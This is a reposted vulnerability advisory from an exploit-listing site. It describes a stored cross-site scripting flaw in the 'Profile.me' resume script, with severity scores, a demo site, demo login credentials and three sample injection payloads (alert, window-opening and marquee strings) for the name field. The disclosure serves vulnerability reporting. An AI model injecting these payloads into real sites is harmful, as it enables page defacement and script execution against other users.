Advertisement






Profile.me - Multiuser profile & resume script Stored XSS Injection

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2019-05-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050047

Below is a copy:

Profile.me - Multiuser profile & resume script Stored XSS Injection
[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Profile.me - Multiuser profile & resume script
  
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the Profile.me - Multiuser profile & resume script web-application.

[?] :: Demo Website:
# https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952
# Frontend: http://profileme.pokkho.com
# Backend: http://profileme.pokkho.com/login
# Login/Password (user): quixss/asdasd

[!] :: Special Note:
# After a few injections you'll see that some blocks on the Users page are broken due to bad input fields data filtering.
# There are various mechanisms to secure application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention  author

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# http://profileme.pokkho.com/login (log in as quixss/asdasd)
# http://profileme.pokkho.com/admin/users (marquee)

[+] :: PoC [Stored XSS Injection]:
# Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the Your Name field for payload injection. Probably there is another vulnerable fields, but they are all disabled on the demo website.
# Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/>
# Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif">
# Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum